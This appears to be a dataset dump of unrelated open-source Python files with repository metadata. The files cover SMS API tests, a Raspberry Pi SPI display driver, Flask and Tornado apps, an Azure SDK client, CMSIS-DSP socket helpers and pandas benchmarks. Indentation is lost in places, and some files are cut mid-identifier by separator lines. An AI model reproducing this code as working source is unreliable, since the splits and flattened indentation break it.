response = api.send(sms)
self.assertFalse(response.success)
def test_should_send_multiple_messages(self):
"""Sending multiple sms messages should work"""
api = clockwork.API(self.api_key)
sms1 = clockwork.SMS(to="441234567890", message="This is a test message 1")
sms2 = clockwork.SMS(to="441234567890", message="This is a test message 2")
response = api.send([sms1,sms2])
for r in response:
self.assertTrue(r.success)
    def test_should_send_multiple_messages_with_errors(self):
"""Sending multiple sms messages, one of which has an invalid message should work"""
api = clockwork.API(self.api_key)
sms1 = clockwork.SMS(to="441234567890", message="This is a test message 1")
sms2 = clockwork.SMS(to="441234567890", message="")
response = api.send([sms1, sms2])
self.assertTrue(response[0].success)
self.assertFalse(response[1].success)
def test_should_fail_with_invalid_key(self):
api = clockwork.API("this_key_is_wrong")
sms = clockwork.SMS(to="441234567890", message="This is a test message 1")
self.assertRaises(clockwork_exceptions.ApiException, api.send, sms)
def test_should_be_able_to_get_balance(self):
api = clockwork.API(self.api_key)
balance = api.get_balance()
self.assertEqual('PAYG', balance['account_type'])
if __name__ == "__main__":
unittest.main()
|
jinzekid/codehub
|
python/数据分析/func_lambda_test.py
|
Python
|
gpl-3.0
| 150
| 0.02
|
from math import log
def make_logarithmic_function(base):
    return lambda x: log(x, base)
My_LF = make_logarithmic_function(3)
print(My_LF(9))
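# log(9, 3) == 2.0, so the call above prints 2.0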
|
|
extsui/7SegFinger
|
test_8digit.py
|
Python
|
mit
| 4,304
| 0.035431
|
# -*- coding: utf-8 -*-
import spidev
import math
def reverse_bit_order(x):
x_reversed = 0x00
if (x & 0x80):
x_reversed |= 0x01
if (x & 0x40):
x_reversed |= 0x02
if (x & 0x20):
x_reversed |= 0x04
if (x & 0x10):
x_reversed |= 0x08
if (x & 0x08):
x_reversed |= 0x10
if (x & 0x04):
x_reversed |= 0x20
if (x & 0x02):
x_reversed |= 0x40
if (x & 0x01):
x_reversed |= 0x80
return x_reversed
"""
x = (((x & 0x55) << 1) | ((x & 0xAA) >> 1)) % 0xFF
x = (((x & 0x33) << 2) | ((x & 0xCC) >> 2)) % 0xFF
return ((x << 4) | (x >> 4)) % 0xFF
"""
def calc_checksum(array):
sum = 0
for item in array:
sum += item
sum %= 256
return (0xFF - sum) % 256
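# Illustrative example: calc_checksum([0x01, 0x64]) == 0x9A, since
# (0x01 + 0x64 + 0x9A) % 256 == 0xFF -- a receiver can validate a frame by
# checking that the byte sum including the checksum comes out to 0xFF mod 256.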
spi = spidev.SpiDev()
spi.open(0, 0)
#
# CS+ data transmit/receive timing setting, type 1
#
# SCK:  ̄ ̄|_| ̄|_| ̄|_| ̄...
# SOp: last bit -> <D7> <D6> <D5> ... -> first bit
#
spi.mode = 0
#
# SPI clock frequency
#  - 500kHz: default
#  - 1MHz: OK
#  - 2MHz: NG (data corruption occurs)
# => set to 1MHz.
#
spi.max_speed_hz = 1000000
#
#
#
data = [ 0x60, 0xDA, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01, ]
brightness = [ 100, 100, 100, 100, 100, 100, 100, 100, ]
# Build one frame
xfer_data = [ 0x01 ]         # type = display data
xfer_data.extend(brightness) # display data section
checksum = calc_checksum(xfer_data)
xfer_data.append(checksum)
print xfer_data
#
# The Raspberry Pi can only transmit data MSB-first.
# (spidev has an spi.lsbfirst member, but it is read-only.)
# => The bits must be reversed before sending.
# [Reference URL] http://tightdev.net/SpiDev_Doc.pdf
#
xfer_data = map(reverse_bit_order, xfer_data)
print xfer_data
# Send the frame
spi.writebytes(xfer_data)
import os
os.system('sleep 1')
num_to_pattern = [
0xfc, # 0
0x60, # 1
0xda, # 2
0xf2, # 3
0x66, # 4
0xb6, # 5
0xbe, # 6
0xe4, # 7
0xfe, # 8
0xf6, # 9
]
rad = 0.0
while (True):
xfer_data = [ 0x01 ]
brightness[0] = int(math.sin(rad + math.pi/8*0) * 50 + 50)
brightness[1] = int(math.sin(rad + math.pi/8*1) * 50 + 50)
brightness[2] = int(math.sin(rad + math.pi/8*2) * 50 + 50)
brightness[3] = int(math.sin(rad + math.pi/8*3) * 50 + 50)
brightness[4] = int(math.sin(rad + math.pi/8*4) * 50 + 50)
brightness[5] = int(math.sin(rad + math.pi/8*5) * 50 + 50)
brightness[6] = int(math.sin(rad + math.pi/8*6) * 50 + 50)
brightness[7] = int(math.sin(rad + math.pi/8*7) * 50 + 50)
xfer_data.extend(brightness)
checksum = calc_checksum(xfer_data)
xfer_data.append(checksum)
xfer_data = map(reverse_bit_order, xfer_data)
spi.writebytes(xfer_data)
os.system('sleep 0.001')
rad += 0.05 * 2
import datetime as dt
now = dt.datetime.now()
xfer_data = [ 0x00 ]
# data[0] = num_to_pattern[now.year / 1000 % 10]
# data[1] = num_to_pattern[now.year / 100 % 10]
# data[2] = num_to_pattern[now.year / 10 % 10]
# data[3] = num_to_pattern[now.year / 1 % 10]
# data[4] = num_to_pattern[now.month / 10 % 10]
# data[5] = num_to_pattern[now.month / 1 % 10]
# data[6] = num_to_pattern[now.day / 10 % 10]
# data[7] = num_to_pattern[now.day / 1 % 10]
data[0] = num_to_pattern[now.hour / 10 % 10]
data[1] = num_to_pattern[now.hour / 1 % 10]
if (now.microsecond < 500*1000):
data[1] |= 0x01;
data[2] = num_to_pattern[now.minute / 10 % 10]
data[3] = num_to_pattern[now.minute / 1 % 10]
if (now.microsecond < 500*1000):
data[3] |= 0x01;
data[4] = num_to_pattern[now.second / 10 % 10]
data[5] = num_to_pattern[now.second / 1 % 10]
if (now.microsecond < 500*1000):
data[5] |= 0x01;
data[6] = num_to_pattern[now.microsecond / 100000 % 10]
data[7] = num_to_pattern[now.microsecond / 10000 % 10]
# data[4] = num_to_pattern[now.microsecond / 1000 % 10]
# data[5] = num_to_pattern[now.microsecond / 100 % 10]
# data[6] = num_to_pattern[now.microsecond / 10 % 10]
# data[7] = num_to_pattern[now.microsecond / 1 % 10]
xfer_data.extend(data)
checksum = calc_checksum(xfer_data)
xfer_data.append(checksum)
xfer_data = map(reverse_bit_order, xfer_data)
spi.writebytes(xfer_data)
|
vlegoff/tsunami
|
src/secondaires/navigation/equipage/controle.py
|
Python
|
bsd-3-clause
| 5,105
| 0.001191
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant la méta-classe et la classe abstraite de contrôle."""
from abstraits.obase import BaseObj, MetaBaseObj
controles = {}
class MetaControle(MetaBaseObj):
"""Métaclasse des contrôles.
Elle ajoute le contrôle dans le dictionnaire 'controles' si il possède
une clé.
"""
def __init__(cls, nom, bases, contenu):
"""Constructeur de la métaclasse"""
MetaBaseObj.__init__(cls, nom, bases, contenu)
if cls.cle:
controles[cls.cle] = cls
class Controle(BaseObj, metaclass=MetaControle):
"""Classe représentant un contrôle.
Un contrôle est une classe intermédiaire entre un objectif et une
volonté. Un contrôle permet de spécifier une action continue
paramétrable. Par exemple, un contrôle permet de paramétrer la
vitesse du navire. Si un équipage possède ce contrôle actif,
le commandant (le capitaine ou second PNJ) va décomposer ce contrôle
en ordres après avoir déterminé combien de voiles, en fonction du
vent, doivent être hissées, ainsi que combien de rames doivent être
tenues et à quelle vitesse. Cependant, un contrôle n'est pas
simpelment une volonté enveloppant d'autres volontés : le contrôle
reste actif jusqu'au moment où il sera remplacé. Admettons que le
vent change de direction et que la vitesse se modifie, le contrôle
doit faire en sorte que la vitesse soit rétablie à celle spécifiée.
Contrairement aux objectifs, volontés et ordres, un contrôle est
actif ou inactif sur un navire en fonction de son type. On ne peut
avoir deux contrôles actifs en même temps sur le même navire
précisant que le navire doit aller à 1 noeud et à 2 noeuds. Par
contre, on peut avoir deux
|
contrôles actifs sur le même navire, l'un
|
de type 'vitesse' précisant que le navire doit aller à 1,7 noeuds
et l'autre de type 'direction' précisant que le navire doit maintenir
ce cap.
"""
cle = None
logger = type(importeur).man_logs.get_logger("ordres")
def __init__(self, equipage, *args):
BaseObj.__init__(self)
self.equipage = equipage
self.arguments = args
def __getnewargs__(self):
arguments = (None, ) + tuple(getattr(self, "arguments", ()))
return arguments
def __repr__(self):
return "<Contrôle {}:{} {}>".format(self.cle_navire, self.cle,
self.arguments)
@property
def navire(self):
return self.equipage and self.equipage.navire or None
@property
def cle_navire(self):
navire = self.navire
return navire and navire.cle or "inconnu"
@property
def commandant(self):
"""Retourne le commdnant (PNJ) du navire."""
commandants = self.equipage.get_matelots_au_poste("commandant",
libre=False)
if commandants:
return commandants[0]
return None
def decomposer(self):
"""Décompose le contrôle en volontés.
C'est la méthode la plus importante et celle qui risque de contenir
le plus de code. Elle décompose réellement le contrôle en volontés
(plier 2 voiles, ramer lentement, par exemple).
"""
raise NotImplementedError
def debug(self, message):
"""Log le message précisé en paramètre en ajoutant des informations."""
message = "Contrôle {}:{}, {}".format(self.cle_navire, self.cle,
message)
self.logger.debug(message)
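# Illustrative sketch of a concrete control (hypothetical; not part of this
# module). Defining the subclass is enough to register it, since the
# metaclass stores it in the 'controles' dictionary under its 'cle':
#   class ControleVitesse(Controle):
#       cle = "vitesse"
#       def decomposer(self):
#           vitesse = self.arguments[0]
#           self.debug("holding speed at {} knots".format(vitesse))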
|
TL4/deploy
|
run.py
|
Python
|
mit
| 92
| 0.032609
|
# coding: utf-8
from deploy import app
if __name__ == '__main__':
    app.run(debug=True)
|
winstonf88/pyjobs
|
pyjobs/app.py
|
Python
|
gpl-2.0
| 750
| 0.001333
|
import logging
import os
import sys
from tornado import ioloop
from tornado import web
from pyjobs import handlers
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logger = logging.getLogger(__name__)
STATIC_PATH = os.path.join(os.path.dirname(__file__), 'static/')
url_patterns = [
web.url('/', handlers.HomeHandler, name='home'),
    web.url('/ws', handlers.WebSocketHandler),
web.url('/static/(.*)', web.StaticFileHandler, {'path': STATIC_PATH}),
]
settings = {
'compiled_template_cache': False,
}
def server():
logger.info('Serving on port 8888')
application = web.Application(url_patterns, **settings)
application.listen(8888)
ioloop.IOLoop.current().start()
if __name__ == '__main__':
server()
|
Azure/azure-sdk-for-python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_08_01/aio/operations/_network_interfaces_operations.py
|
Python
|
mit
| 72,800
| 0.004973
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfacesOperations:
"""NetworkInterfacesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
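    # Illustrative usage sketch (assumes an authenticated async
    # NetworkManagementClient `client`; the resource names are hypothetical):
    #   poller = await client.network_interfaces.begin_delete("my-rg", "my-nic")
    #   await poller.result()  # returns once the delete LRO completes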
async def get(
self,
resource_group_name: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterface":
"""Gets information about the specified network interface.
        :param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
        :keyword callable cls: A custom type or function that will be passed the direct response
|
ARM-software/CMSIS_5
|
CMSIS/DSP/cmsisdsp/sdf/nodes/host/message.py
|
Python
|
apache-2.0
| 3,886
| 0.022131
|
# --------------------------------------------------------------------------
# Copyright (c) 2020-2022 Arm Limited (or its affiliates). All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the License); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------
import sys
# VSI KIND
VSIOUTPUT = 0
VSIINPUT = 1
# MESSAGE IDs
CLIENTREADBUF=1
CLIENTWRITEBUF=2
CLIENTSTOP=3
# PACKETSIZE : default number of bytes read on a socket
PACKETSIZE = 1024
# Conversion between sizes expressed in bytes and in Q15
INTSIZE = 2
# Error raised when trying to read / write to sockets
class ErrorTooMuchDataReceived(Exception):
pass
class CantReceiveData(Exception):
pass
def clientID(inputMode,theID):
return([(theID << 1) | inputMode])
# Receive a given number of bytes
# Socket is read by block of PACKETSIZE
def receiveBytes(conn,nb):
data = b""
while nb > 0:
if nb < PACKETSIZE:
newData = conn.recv(nb)
if not newData: raise CantReceiveData
else:
newData= conn.recv(PACKETSIZE)
if not newData: raise CantReceiveData
nb = nb - len(newData)
if nb < 0:
raise ErrorTooMuchDataReceived
data += newData
return(data)
# Send bytes
def sendBytes(conn,data):
conn.sendall(data)
# Convert a list of Q15 to a bytestream
def list_t
|
o_bytes(l):
return(b"".join([x.to_bytes(INTSIZE,byteorder=sys.byteorder,signed=True) for x in l]))
# Convert a bytestream to a list
|
of Q15
def bytes_to_list(l):
res=[]
i = 0
while(i<len(l)):
res.append(int.from_bytes(l[i:i+INTSIZE],byteorder=sys.byteorder,signed=True))
i = i+INTSIZE
return(res)
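# Illustrative round trip (assuming a little-endian host, INTSIZE == 2):
#   list_to_bytes([1, -2])             -> b'\x01\x00\xfe\xff'
#   bytes_to_list(b'\x01\x00\xfe\xff') -> [1, -2]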
# Send a list of Q15
def sendIntList(conn,l):
data = list_to_bytes(l)
sendBytes(conn,data)
# Receive a list of Q15
def getIntList(conn,length):
data = receiveBytes(conn,INTSIZE*length)
return(bytes_to_list(data))
# Low level bytes management
# Return the message ID and the number of bytes expected in the message
def getMsgAndNbOfBytes(data):
msgID = int(data[0])
length= int.from_bytes(data[1:5],byteorder=sys.byteorder,signed=False)
return(msgID,length)
# A client is requesting data from the server. It is the input of VHT
# Client -> Server
def getBufferMsg(conn,nbBytes):
# Ask buffer from server
a=(CLIENTREADBUF).to_bytes(1,byteorder=sys.byteorder)
b=(nbBytes).to_bytes(4,byteorder=sys.byteorder)
msg=a+b
sendBytes(conn,msg)
# Receive buffer from server
data = receiveBytes(conn,nbBytes)
return(data)
# Stop the server when the end of the SDF scheduling has been reached.
# It is to make it easier to end the demo.
# Only the VHT client has to be killed.
# Client -> Server
def stopMsg(conn):
# Send a stop message to server
a=(CLIENTSTOP).to_bytes(1,byteorder=sys.byteorder)
b=(0).to_bytes(4,byteorder=sys.byteorder)
msg=a+b
sendBytes(conn,msg)
# Data in bytes
# A client sends some bytes to the server
# It is the output of VHT
# Client -> Server
def writeBufferMsg(conn,theBytes):
# Tell server a buffer is coming
a=(CLIENTWRITEBUF).to_bytes(1,byteorder=sys.byteorder)
nbBytes = len(theBytes)
b=(nbBytes).to_bytes(4,byteorder=sys.byteorder)
msg = a+b+theBytes
# Send message and buffer to server
sendBytes(conn,msg)
|
darren-rogan/CouchPotatoServer
|
libs/flask/views.py
|
Python
|
gpl-3.0
| 5,629
| 0
|
# -*- coding: utf-8 -*-
"""
flask.views
~~~~~~~~~~~
This module provides class-based views inspired by the ones in Django.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from .globals import request
http_method_funcs = frozenset(['get', 'post', 'head', 'options',
'delete', 'put', 'trace', 'patch'])
class View(object):
"""Alternative way to use view functions. A subclass has to implement
:meth:`dispatch_request` which is called with the view arguments from
the URL routing system. If :attr:`methods` is provided the methods
do not have to be passed to the :meth:`~flask.Flask.add_url_rule`
method explicitly::
class MyView(View):
methods = ['GET']
def dispatch_request(self, name):
return 'Hello %s!' % name
app.add_url_rule('/hello/<name>', view_func=MyView.as_view('myview'))
When you want to decorate a pluggable view you will have to either do that
when the view function is created (by wrapping the return value of
:meth:`as_view`) or you can use the :attr:`decorators` attribute::
class SecretView(View):
methods = ['GET']
decorators = [superuser_required]
def dispatch_request(self):
...
The decorators stored in the decorators list are applied one after another
when the view function is created. Note that you can *not* use the class
based decorators since those would decorate the view class and not the
generated view function!
"""
    #: A list of methods this pluggable view can handle.
methods = None
    #: The canonical way to decorate class-based views is to decorate the
    #: return value of as_view(). However, that moves parts of the logic
    #: from the class declaration to the place where it's hooked into the
    #: routing system, so decorators can be listed here instead.
#:
#: You can place one or more decorators in this list and whenever the
#: view function is created the result is automatically decorated.
#:
#: .. versionadded:: 0.8
decorators = []
def dispatch_request(self):
"""Subclasses have to override this method to implement the
actual view function code. This method is called with all
the arguments from the URL rule.
"""
raise NotImplementedError()
@classmethod
def as_view(cls, name, *class_args, **class_kwargs):
"""Converts the class into an actual view function that can be used
with the routing system. Internally this generates a function on the
fly which will instantiate the :class:`View` on each request and call
the :meth:`dispatch_request` method on it.
The arguments passed to :meth:`as_view` are forwarded to the
constructor of the class.
"""
def view(*args, **kwargs):
self = view.view_class(*class_args, **class_kwargs)
return self.dispatch_request(*args, **kwargs)
if cls.decorators:
view.__name__ = name
view.__module__ = cls.__module__
for decorator in cls.decorators:
view = decorator(view)
# we attach the view class to the view function for two reasons:
# first of all it allows us to easily figure out what class-based
# view this thing came from, secondly it's also used for instantiating
# the view class so you can actually replace it with something else
# for testing purposes and debugging.
view.view_class = cls
view.__name__ = name
view.__doc__ = cls.__doc__
view.__module__ = cls.__module__
view.methods = cls.methods
return view
class MethodViewType(type):
def __new__(cls, name, bases, d):
rv = type.__new__(cls, name, bases, d)
if 'methods' not in d:
methods = set(rv.methods or [])
for key, value in d.iteritems():
if key in http_method_funcs:
methods.add(key.upper())
# if we have no method at all in there we don't want to
# add a method list. (This is for instance the case for
# the baseclass or another subclass of a base method view
            # that does not introduce new methods).
if methods:
rv.methods = sorted(methods)
return rv
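# Illustrative sketch: with the metaclass above, a subclass such as
#   class ItemAPI(MethodView):
#       def get(self, id): ...
#       def post(self): ...
# ends up with ItemAPI.methods == ['GET', 'POST'] without listing them by hand.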
class MethodView(View):
"""Like a regular class-based view but that dispatches requests to
particular methods. For instance if you implement a method called
    :meth:`get` it means you will respond to ``'GET'`` requests and
the :meth:`dispatch_request` implementation will automatically
forward your request to that. Also :attr:`options` is set for you
automatically::
class CounterAPI(MethodView):
def get(self):
return session.get('counter', 0)
def post(self):
session['counter'] = session.get('counter', 0) + 1
return 'OK'
app.add_url_rule('/counter', view_func=CounterAPI.as_view('counter'))
"""
__metaclass__ = MethodViewType
def dispatch_request(self, *args, **kwargs):
meth = getattr(self, request.method.lower(), None)
# if the request method is HEAD and we don't have a handler for it
# retry with GET
if meth is None and request.method == 'HEAD':
meth = getattr(self, 'get', None)
assert meth is not None, 'Unimplemented method %r' % request.method
return meth(*args, **kwargs)
|
driftyco/ionitron-issues
|
tests/test_close_old_issue.py
|
Python
|
mit
| 3,578
| 0.006149
|
# python -m unittest discover
import unittest
from datetime import datetime
from tasks import old_issues as c
class TestCloseOldIssue(unittest.TestCase):
def test_is_closed_issue(self):
self.assertEquals(c.is_closed({'closed_at': None}), False)
self.assertEquals(c.is_closed({'closed_at': "2014-10-10T00:09:51Z"}), True)
def test_is_pull_request(self):
self.assertEquals(c.is_pull_request({}), False)
self.assertEquals(c.is_pull_request({'pull_request': {}}), True)
def test_has_milestone(self):
self.assertEquals(c.has_milestone({'milestone': None}), False)
self.assertEquals(c.has_milestone({'milestone': "v1.1"}), True)
def test_is_old_issue(self):
self.assertEquals(c.is_old_issue(datetime(2000, 1, 1), now=datetime(2000, 1, 9), close_inactive_after=10), False)
self.assertEquals(c.is_old_issue(datetime(2000, 1, 1), now=datetime(2000, 1, 11), close_inactive_after=10), False)
self.assertEquals(c.is_old_issue(datetime(2000, 1, 1), now=datetime(2000, 1, 12), close_inactive_after=10), True)
def test_has_labels_preventing_close(self):
self.assertEquals(c.has_labels_preventing_close({
'labels': [{
'name': 'bug'
}]
}, ['in progress', 'ready', 'high priority']), False)
self.assertEquals(c.has_labels_preventing_close({}, ['in progress', 'ready', 'high priority']), False)
self.assertEquals(c.has_labels_preventing_close({ 'labels': [] }, ['in progress', 'ready', 'high priority']), False)
self.assertEquals(c.has_labels_preventing_close({
'labels': [{
'name': 'ready'
}]
}, ['in progress', 'ready', 'high priority']), True)
def test_has_comments_preventing_close(self):
self.assertEquals(c.has_comments_preventing_close({
'comments': None
}, 2), False)
self.assertEquals(c.has_comments_preventing_close({
'comments': 0
}, 2), False)
self.assertEquals(c.has_comments_preventing_close({
'comments': 2
}, 2), False)
self.assertEquals(c.has_comments_preventing_close({
'comments': 3
}, 2), True)
def test_has_assignee_preventing_close(self):
self.assertEquals(c.has_assignee_preventing_close({
'assignee': None
}), False)
self.assertEquals(c.has_assignee_preventing_close({
'assignee': {}
}), False)
self.assertEquals(c.has_assignee_preventing_close({
'assignee': { 'login': 'steve' }
}), True)
def test_has_milestone_preventing_close(self):
self.assertEquals(c.has_milestone_preventing_close({}), False)
self.assertEquals(c.has_milestone_preventing_close({
'milestone': None
}), False)
self.assertEquals(c.has_milestone_preventing_close({
'milestone': {}
}), False)
self.assertEquals(c.has_milestone_preventing_close({
'milestone': { 'url': 'https://api.github.com/repos/octocat/Hello-World/milestones/1' }
}), True)
def test_has_events_preventing_close(self):
        self.assertEquals(c.has_events_preventing_close(None), False)
self.assertEquals(c.has_events_preventing_close([
            { 'event': 'closed' },
{ 'event': 'labeled' }
]), False)
self.assertEquals(c.has_events_preventing_close([
{ 'event': 'closed' },
{ 'event': 'referenced' }
]), True)
|
zfrenchee/pandas
|
asv_bench/benchmarks/offset.py
|
Python
|
bsd-3-clause
| 3,276
| 0
|
# -*- coding: utf-8 -*-
from datetime import datetime
import numpy as np
import pandas as pd
try:
import pandas.tseries.holiday # noqa
except ImportError:
pass
hcal = pd.tseries.holiday.USFederalHolidayCalendar()
# These offsets currently raise a NotImplementedError with .apply_index()
non_apply = [pd.offsets.Day(),
pd.offsets.BYearEnd(),
pd.offsets.BYearBegin(),
pd.offsets.BQuarterEnd(),
pd.offsets.BQuarterBegin(),
pd.offsets.BMonthEnd(),
pd.offsets.BMonthBegin(),
pd.offsets.CustomBusinessDay(),
pd.offsets.CustomBusinessDay(calendar=hcal),
pd.offsets.CustomBusinessMonthBegin(calendar=hcal),
pd.offsets.CustomBusinessMonthEnd(calendar=hcal),
pd.offsets.CustomBusinessMonthEnd(calendar=hcal)]
other_offsets = [pd.offsets.YearEnd(), pd.offsets.YearBegin(),
pd.offsets.QuarterEnd(), pd.offsets.QuarterBegin(),
pd.offsets.MonthEnd(), pd.offsets.MonthBegin(),
pd.offsets.DateOffset(months=2, days=2),
pd.offsets.BusinessDay(), pd.offsets.SemiMonthEnd(),
pd.offsets.SemiMonthBegin()]
offsets = non_apply + other_offsets
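# asv expands `params`, so each benchmark class below is timed once per offset
# in its params list (e.g. ApplyIndex runs separately for YearEnd(), YearBegin(), ...).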
class ApplyIndex(object):
goal_time = 0.2
params = other_offsets
param_names = ['offset']
def setup(self, offset):
N = 10000
self.rng = pd.date_range(start='1/1/2000', periods=N, freq='T')
def time_apply_index(self, offset):
offset.apply_index(self.rng)
class OnOffset(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
self.dates = [datetime(2016, m, d)
for m in [10, 11, 12]
for d in [1, 2, 3, 28, 29, 30, 31]
if not (m == 11 and d == 31)]
def time_on_offset(self, offset):
for date in self.dates:
offset.onOffset(date)
class OffsetSeriesArithmetic(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
N = 1000
rng = pd.date_range(start='1/1/2000', periods=N, freq='T')
self.data = pd.Series(rng)
def time_add_offset(self, offset):
self.data + offset
class OffsetDatetimeIndexArithmetic(object):
goal_time = 0.2
params = offsets
    param_names = ['offset']
